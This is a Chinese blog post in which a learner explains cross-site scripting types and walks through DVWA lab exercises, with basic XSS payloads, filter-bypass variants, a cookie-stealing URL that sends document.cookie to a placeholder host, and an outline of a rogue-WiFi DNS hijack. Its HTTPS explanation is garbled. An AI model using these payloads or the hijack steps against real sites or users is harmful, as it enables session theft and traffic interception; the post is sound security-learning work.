<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="基于XSS的个人理解与基本练习, Greypotato">
    <meta name="description" content="前端安全–XSS攻击XSS漏洞是最广泛、作用最关键的web安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环，通过XSS，黑客可以得到的最直接利益就是拿到用户浏览器的cookie，从而变相盗取用户的账号密码。
这些常用的基本">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>基于XSS的个人理解与基本练习 | Greypotato</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
</head>


<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Greypotato</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>关于</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fa fa-address-book"></i>
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="搜索"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Greypotato</div>
        <div class="logo-desc">
            
            有志者自有千计万计，无志者只感千难万难。
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                关于
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-address-book"></i>
                
                友情链接
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/Greypotato?tab=repositories" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/Greypotato?tab=repositories" class="github-corner tooltipped hide-on-med-and-down" target="_blank" data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewbox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/>
    </svg>
</a>
        
    </nav>

</header>





<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/0.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        基于XSS的个人理解与基本练习
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-07-09
                </div>

                
				
				
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="fa fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="前端安全–XSS攻击"><a href="#前端安全–XSS攻击" class="headerlink" title="前端安全–XSS攻击"></a>前端安全–XSS攻击</h2><p>XSS漏洞是最广泛、作用最关键的web安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环，通过XSS，黑客可以得到的最直接利益就是拿到用户浏览器的cookie，从而变相盗取用户的账号密码。</p>
<p>这些常用的基本的攻击方式对我们学web安全的来说提升自己的同时，也能体验到XSS的乐趣。</p>
<p>在我们学习的时候需要理解XSS的原理以及特点</p>
<h3 id="关于XSS简述"><a href="#关于XSS简述" class="headerlink" title="关于XSS简述"></a>关于XSS简述</h3><p>跨站脚本攻击（XSS），是目前最普遍的Web应用安全漏洞。这些漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。<br>攻击者可以使用户在浏览器中执行其预定义的恶意脚本，其导致的危害可想而知，如劫持用户会话，插入恶意内容、重定向用户、使用恶意软件劫持用户浏览器对用户进行一定程度的破坏。</p>
<h3 id="XSS的原理"><a href="#XSS的原理" class="headerlink" title="XSS的原理"></a>XSS的原理</h3><p>学习什么都要记得先弄清楚原理。网站的搭建大部分都是上HTML+CSS然后嵌入javascript。标记语言HTML通过将一些字符特殊地对待来区别文本和标记，当动态页面中插入的内容含有这些特殊字符（如&lt;）时，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段javascript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞。</p>
<h3 id="XSS的类型"><a href="#XSS的类型" class="headerlink" title="XSS的类型"></a>XSS的类型</h3><p>1.反射型 Reflected XSS<br>反射型 XSS 一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。对于访问者而言是一次性的，具体表现在我们把我们的恶意脚本通过 URL 的方式传递给了服务器，而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。反射型 XSS 的触发有后端的参与，要避免反射性 XSS，必须需要后端的协调，后端解析前端的数据时首先做相关的字串检测和转义处理。</p>
<p>2.基于DOM或本地的XSS攻击 DOM-Based型<br>基于DOM的XSS跨站脚本攻击是通过修改页面。DOM节点数据信息而形成的XSS跨站脚本攻击。不同于反射型XSS和存储型XSS，基于DOM的XSS跨站脚本攻击往往需要针对具体的Javascript DOM代码进行分析，并根据实际情况进行XSS跨站脚本攻击的利用。</p>
<p>3.存储型 Stored XSS<br>这种类型的XSS，危害比前一种大得多。比如一个攻击者在论坛的楼层中包含了一段JavaScript代码，并且服务器没有正确进行过滤输出，那就会造成浏览这个页面的用户执行这段JavaScript代码。 </p>
<h2 id="XSS攻击举例"><a href="#XSS攻击举例" class="headerlink" title="XSS攻击举例"></a>XSS攻击举例</h2><p>1.反射型攻击<br>（1）正比如我们在京东或者淘宝搜索”笔记本”,搜不到书的时候显示提交的名称。（2）在搜索框搜索内容，填入“script alert(‘matebook’)/script”, 点击搜索。(由于个人编译器的问题省略了&lt;&gt;记得加上哦)（3）当前端页面没有对返回的数据进行过滤，直接显示在页面上， 这时就会alert那个字符串出来。我们都知道alert是一个弹出框口在web页面中。（4） 进而可以构造获取用户cookies的地址，通过QQ群或者垃圾邮件，来让其他人点击这个地址：<br><a href="http://www.jingdong.com/search?name=" target="_blank" rel="noopener">http://www.jingdong.com/search?name=</a> script document.location=’<a href="http://xxx/get?cookie=&#39;+document.cookie" target="_blank" rel="noopener">http://xxx/get?cookie=&#39;+document.cookie</a> script(由于个人编译器的问题省略了&lt;&gt;记得加上哦)<br>这个地址是伪造的 ，当然是无效的地址。这些地址的来源都是来自QQ邮箱中收到的垃圾邮件以及诈骗的链接中的。</p>
<p>2.存储型攻击<br>基于存储的XSS攻击，是通过发表带有恶意跨域脚本的帖子/文章，从而把恶意脚本存储在服务器，每个访问该帖子/文章的人就会触发执行。<br>正如</p>
<ol>
<li>发一篇文章，里面包含了恶意脚本<br>今天你做CTF了吗？你打CTF像胡一天 script alert(‘handsome boy’) /script (由于个人编译器的问题省略了&lt;&gt;记得加上哦)</li>
<li>后端没有对文章进行过滤，直接保存文章内容到数据库。</li>
<li>当其他看这篇文章的时候，包含的恶意脚本就会执行。<br>因为部分文章是保存整个HTML内容的，前端显示时候也不做过滤，就极又极大的可能出现这种情况。</li>
</ol>
<p>对于这种我们可以采用一些安全的防护措施<br>在开发的时候我们可以：</p>
<ol>
<li>首要是服务端要进行过滤，因为前端的校验可以被绕过。</li>
<li>当服务端不校验时候，前端要以各种方式过滤里面可能的恶意脚本，例如script标签，将特殊字符转换成HTML编码。</li>
</ol>
<p>3.DOM-based or local XSS<br>基于DOM或本地的XSS攻击。一般是提供一个免费的wifi，但是提供免费wifi的网关会往你访问的任何页面插入一段脚本或者是直接返回一个钓鱼页面，从而植入恶意脚本。这种直接存在于页面，无须经过服务器返回就是基于本地的XSS攻击。<br>例子一：</p>
<ol>
<li>提供一个免费的wifi。</li>
<li>开启一个特殊的DNS服务，将所有域名都解析到我们的电脑上，并把Wifi的DHCP-DNS设置为我们的电脑IP。</li>
<li>之后连上wifi的用户打开任何网站，请求都将被我们截取到。我们根据http头中的host字段来转发到真正服务器上。</li>
<li>收到服务器返回的数据之后，我们就可以实现网页脚本的注入，并返回给用户。</li>
<li>当注入的脚本被执行，用户的浏览器将依次预加载各大网站的常用脚本库。</li>
</ol>
<p>这个例子来自大佬的博客，<a href="http://www.cnblogs.com/index-html/p/wifi_hijack_3.html#!comments" target="_blank" rel="noopener">http://www.cnblogs.com/index-html/p/wifi_hijack_3.html#!comments</a></p>
<p>这个是大佬进行的wifi流量劫持，中间人可以看到用户的每一个请求，可以在页面嵌入恶意代码，使用恶意代码获取用户的信息，可以返回钓鱼页面。 PS：对这个有兴趣的可以进行一下尝试，个人本人对这个挺感兴趣的。<br>例子二：</p>
<ol>
<li>还是提供一个免费wifi</li>
<li>在我们电脑上进行抓包</li>
<li>分析数据，可以获取用户的微信朋友圈、邮箱、社交网站帐号数据（HTTP）。<br>这个是HTTP的窃取，本身跟网站的关系不是特别的大，只是数据被中间人获取了而已，因为HTTP是明文传输的，所以这个容易被别有心思的人所利用。注意防范。<br>开发安全措施：<br>上面提到了使用HTTP协议，HTTP协议相对于HTTPS协议，两者的差异性是在安全性上面的，所以就协议本身来说HTTPS协议的安全性高于HTTP，所以HTTPS会在请求数据之前进行一次握手，使得客户端与服务端都有一个私钥，服务端用这个私钥加密，客户端用这个私钥解密，这样即使数据被人截取了，也是加密后的数据。</li>
</ol>
<h2 id="小小总结"><a href="#小小总结" class="headerlink" title="小小总结"></a>小小总结</h2><p>XSS攻击的特点就是：用一些办法在目标网站上执行非目标网站上原有的脚本</p>
<p>本地的XSS攻击的示例2其实不算XSS攻击，只是简单流量劫持。前两种XSS攻击是我们在以后的开发时候要注意的，而流量劫持的则可以使用HTTPS提高安全性。</p>
<h2 id="小练习"><a href="#小练习" class="headerlink" title="小练习"></a>小练习</h2><p>一、为了能够更好的了解这三种XSS攻击类型，在网上找到了一个在线的练习平台，平台名字叫安全龙，免费的实验室，在里面可以根据自己的需求进行练习。 </p>
<p>个人是在实验室中进入了DVWA靶场，当然你也可以从DVWA的官网上下载到电脑进行部署也可以。</p>
<p>首先我们可以先进行反射型XSS的应用</p>
<h3 id="1-反射型XSS"><a href="#1-反射型XSS" class="headerlink" title="1.反射型XSS"></a>1.反射型XSS</h3><p>进入到DVWA环境中，首先根据平台提示进入，之后选择安全等级。<br><img src="/2019/07/09/XSS/security.PNG" alt="Image">在这里是最低的，可以根据个人的需要进行调整</p>
<h4 id="初级"><a href="#初级" class="headerlink" title="初级"></a>初级</h4><p>我们进入到其中的反射型XSS（Reflected）中，在右下角有一个Viwe source 这个点击我们可以看到页面的源代码。之后进行尝试。<img src="/2019/07/09/XSS/Reflected1.PNG" alt="Image"></p>
<p>可以看到源码中没有任何的过滤，我们可以使用最常用的也是最基本的语句： script alert(/dxy/) /script （&lt;&gt;由于编辑器使用后默认为网页源代码这里给去掉了，各位进行试验的时候记得加上！）<br><img src="/2019/07/09/XSS/D1ROK.PNG" alt="Image"></p>
<h4 id="中级"><a href="#中级" class="headerlink" title="中级"></a>中级</h4><p>接下来我们选择一下等级。选择到中级Medium。<br>可以进行一下实验看中级下原来可以弹窗的初级语句有什么变化没有。输入后发现<img src="/2019/07/09/XSS/REZC.PNG" alt="Image"></p>
<p>可以看出没有任何的弹窗提示 ，只是出现了你刚才命令弹窗中的内容。<br>这时候我们同样的方式查看他的源代码。发现有一部分被过滤掉了。<br><img src="/2019/07/09/XSS/REZY.PNG" alt="Image"></p>
<p>在这里我们可以清晰的看到我们输入的字符中发现前面的&lt; script&gt;没有了，那就看看源代码中有什么过滤方式把&lt; script&gt;给过滤掉了.<br>str_replace(‘&lt; script&gt;’ ‘’)这里的str_replace（）函数以其他字符替换字符串中的一些字符，该函数区分大小写。使用 str_ireplace() 函数执行不区分大小写的搜索。</p>
<p>这里我们了解了该函数区分大小写。这样我们就可以使用大小写来进行绕过他的过滤从而达到我们想要的效果。<br>&lt; ScRipt&gt;alert(/sl/)&lt;/ script&gt;这样来实现结果。<br><img src="/2019/07/09/XSS/rezOK2.PNG" alt="Image"><br>PS：这个地方由于只是用了一个过滤，我们可以用其他的方法绕过去，继续进行。<br>例如双写绕过的写法PS：我又把&lt;&gt;加上了这样看起来方便，只是源代码的‘&lt;’后面有一个空格记得清除。</p>
<p>&lt; sc&lt; script&gt;ript&gt;alert(/sl/)&lt;/ script&gt;<br>使用这个双写绕过的写法看到str_replace() 函数把包裹在外层的 &lt; script&gt;给过滤掉了，但是我里面的语句并不会过滤掉，这样的话 我内部的语句同样来说可以继续执行下去。测试木的问题。成功。<br>进入下一个等级</p>
<h4 id="高级"><a href="#高级" class="headerlink" title="高级"></a>高级</h4><p> 进入高级节奏，输入之前的命令试试吧 我们输入之前初级的语句，尝试看看它过滤掉了什么。<br> <img src="/2019/07/09/XSS/G1.PNG" alt="Image"><br> 结果输入进去发现只剩下了个‘&gt;’ 。。。这样的情况，还是看看源代码比较好。<img src="/2019/07/09/XSS/G1ym.PNG" alt="Image"><br> 这里我看到了一个新的函数preg_replace（）函数  个人不太懂所以去搜索了一下，得到的是这样的结果。</p>
<p> preg_replace 函数执行一个正则表达式的搜索和替换。个人还是不太懂，于是我又去详细的了解了一下。<br> 例如:$str=”as2223adfsf0s4df0sdfsdf”;</p>
<p>echo preg_replace(“/0/“,””,$str);</p>
<p>这里的意思是去掉0字符，此时相当于 replace的功能, preg_replace(“/0/“,”A”,$str); 这样就是将0变成A的意思了<br>这样来看就比较明了了。 ps:匹配的字符串必须加/ / （可以看看第一个参数）</p>
<p>弄清楚了这个函数的意义，我们再看这个题 可以看到他把script给完全过滤掉了 这里有点小问题，它把script给过滤了，。。。我该用什么去弹窗。。。 除了script我们还可以用HTML标记语言来进行啊。我尝试了”onclick=”window.alert() 发现并没有成功，参考大佬的blog发现可以使用body进行弹窗输出。于是使用了</p>
<p>&lt; body onclick=alert(/sl/)&gt;来进行实验，结果成功弹出窗口。<br><img src="/2019/07/09/XSS/G1JG.PNG" alt="Image"></p>
<p>接下来。。尝试impossible</p>
<h4 id="impossible"><a href="#impossible" class="headerlink" title="impossible"></a>impossible</h4><p> 看到这个等级 impossible 不可绕过。这还没进行尝试他就给你说了难度。不过还是要去尝试一下。这里我选择了直接看源码。<br> <img src="/2019/07/09/XSS/im1.PNG" alt="Image"><br> 发现了htmlspecia1chars（）这个函数，不懂的我，再次求助了度娘。<br>发现它的作用:传入字符串$html,将$html中包含&lt;&gt;等HTML中预留的字符,转换成字符实体,返回转换后的字符串</p>
<p>定义和用法</p>
<p>htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。</p>
<p>预定义的字符是：</p>
<pre><code>&amp; （和号）成为 &amp;
&quot; （双引号）成为 &quot;
&apos; （单引号）成为 &apos;
&lt; （小于）成为 &lt;
&gt; （大于）成为 &gt;
</code></pre><p>PS：如需把特殊的 HTML 实体转换回字符，请使用 htmlspecialchars_decode() 函数</p>
<p>它的应用场景:</p>
<pre><code>a.想在HTML中直接显示源码(等同右击=&gt;查看源码效果),此时可以使用htmlspecialchars()对想输出的源码进行转义;

b.文本过滤:在表单页,防止恶意注入,如在输入框中输入&lt;?php $sql=&quot;drop tabal user&quot;;mysql_query($sql); ?&gt;,此时使用htmlspecialchars()转义后,该脚本中的&lt;&gt;将会被转为字符实体,在php中不会执行.
</code></pre><p>可以看出这个用来防注入字符是最好不过的了。</p>
<h3 id="2-储存型XSS"><a href="#2-储存型XSS" class="headerlink" title="2.储存型XSS"></a>2.储存型XSS</h3><p>这里我们试着通过练习来了解储存型的XSS攻击。依旧是从低向高进行。</p>
<h4 id="初级-1"><a href="#初级-1" class="headerlink" title="初级"></a>初级</h4><p> 我们同样开始进行尝试。输入语句。这时发现<img src="/2019/07/09/XSS/S1CS.PNG" alt="Image">它在页面上对字符的长度进行了一定的限制，这时候我们打开控制台，进行一个临时的编译，将输入字符串的长度进行更改。<br> <img src="/2019/07/09/XSS/S1JG.PNG" alt="Image"><br> 图中可以看到光标所选中的那一行。有这样maxlength=”30”这是我修改过的，修改之前的为10.修改后就可以看到能够输入进去了。<br> 输入之前的命令 发现没有啥改变 于是我又进行了一番摸索，发现之前的理解还是不够，最终摸索到了<img src="/2019/07/09/XSS/S1JG1.PNG" alt="Image"><br> 之后继续随便输入了name：test与 message：123123 之后出现了弹窗，之后的每一次输入都出现了刚才语句中间的内容。</p>
<p> 每当进入一个新的界面都会出现一个弹窗。</p>
<p> 小结：这时更清楚了储存型与反射型的不同的地方，储存型是持续，持久的进行弹窗。反射性不同，与之相反。</p>
<h4 id="中级-1"><a href="#中级-1" class="headerlink" title="中级"></a>中级</h4><p> 同样使用初级语句进行测试。<br> <img src="/2019/07/09/XSS/S2ZC.PNG" alt="Image"><br>可以看到我们输入的name是 alert(/sl/)。这时候我们查看一下源代码。<img src="/2019/07/09/XSS/S2CSYM.PNG" alt="Image"></p>
<p>可以看到它过滤掉的字符在这里<img src="/2019/07/09/XSS/S2ZYM1.PNG" alt="Image"><br>SCRIPT整个被过滤掉了，这时我们仍然可以使用之前在反射型XSS中的绕过语句。<br>双写绕过，以及大小写绕过。<br>&lt; body onclick=alert(/sl/)&gt;<br>&lt; ScRipt&gt;alert(/sl/)&lt;/ script&gt;<br>&lt; sc&lt; script&gt;ript&gt;alert(/sl/)&lt;/ script&gt;<br>这些语句均可以使用。<img src="/2019/07/09/XSS/S2ZJ.PNG" alt="Image"><br>这时候都出现了弹窗。我们已经成功的注入进去了。</p>
<h4 id="高级-1"><a href="#高级-1" class="headerlink" title="高级"></a>高级</h4><p>接下来我们步入高级的节奏。同样输入语句进行一个小小的注入测试。我们可以看到写进去的name <img src="/2019/07/09/XSS/SG1.PNG" alt="Image">被过滤的只剩一个”&gt;” 它的过滤类型应该跟之前反射型的高级模式是一样的 。我们查看一下源代码。<img src="/2019/07/09/XSS/SG1YM.PNG" alt="Image"><br>源码中的语句<img src="/2019/07/09/XSS/SG1J.PNG" alt="Image"><br>可以看到还是同样的preg_replace()函数依旧执行一个正则表达式的搜索和替换。<br>继续通过上次成功的语句&lt; body onclick=alert(/sl/)&gt;来进行实验。<br><img src="/2019/07/09/XSS/SG1JG1.PNG" alt="Image"><br>成功的可以看到弹窗 依次进行实验同样可以是持久性的弹窗。</p>
<h4 id="impossible-1"><a href="#impossible-1" class="headerlink" title="impossible"></a>impossible</h4><p> 有道理impossible 不可绕过的情况 我们一样直接进入，直接查看源码。<img src="/2019/07/09/XSS/im2.PNG" alt="Image"><br> 发现在输出那有一个htmlspecialchars() 函数，所以这个原理就和反射型XSS攻击一样.这里就简单的进行了对XSS熟悉的练习。通过这些练习，我们可以更深入的了解了XSS的不同类型的不同特点。</p>
<h2 id="总结与感悟"><a href="#总结与感悟" class="headerlink" title="总结与感悟"></a>总结与感悟</h2><h3 id="对字符转义的总结"><a href="#对字符转义的总结" class="headerlink" title="对字符转义的总结"></a>对字符转义的总结</h3><p> <img src="/2019/07/09/XSS/ZFZY.PNG" alt="Image"><br> 简单了解的判定<br> <img src="/2019/07/09/XSS/ZY.PNG" alt="Image"></p>
<h3 id="感悟"><a href="#感悟" class="headerlink" title="感悟"></a>感悟</h3><p> 通过这次的XSS学习与了解，能够更深入的了解到XSS的原理，特征，以及不同的注入方式，注入语句。<br> 只有动手去实践一遍，去实际的操作，才能更好的了解，通过写blog记录下下来，能够帮助自己更好的找到问题，梳理清楚自己的问题与思路所在。总之，还是需要继续努力，继续向前。</p>
<p> 加油！前面的路还很遥远。</p>

            </div>
            <hr>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone" data-wechat-qrcode-helper="<p>微信里点“发现”->“扫一扫”二维码便可查看分享。</p>"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            <div class="reprint">
                <p>
                    <span class="reprint-tip">
                        <i class="fa fa-exclamation-circle"></i>&nbsp;&nbsp;转载请注明:
                    </span>
                    <a href="https://Greypotato.github.io" class="b-link-green">Greypotato</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/07/09/XSS/" class="b-link-green">基于XSS的个人理解与基本练习</a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-dot-circle-o"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2019/07/09/XSS/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="基于XSS的个人理解与基本练习">
                        
                        <span class="card-title">基于XSS的个人理解与基本练习</span>
                    </div>
                </a>
                <div class="card-content article-content">
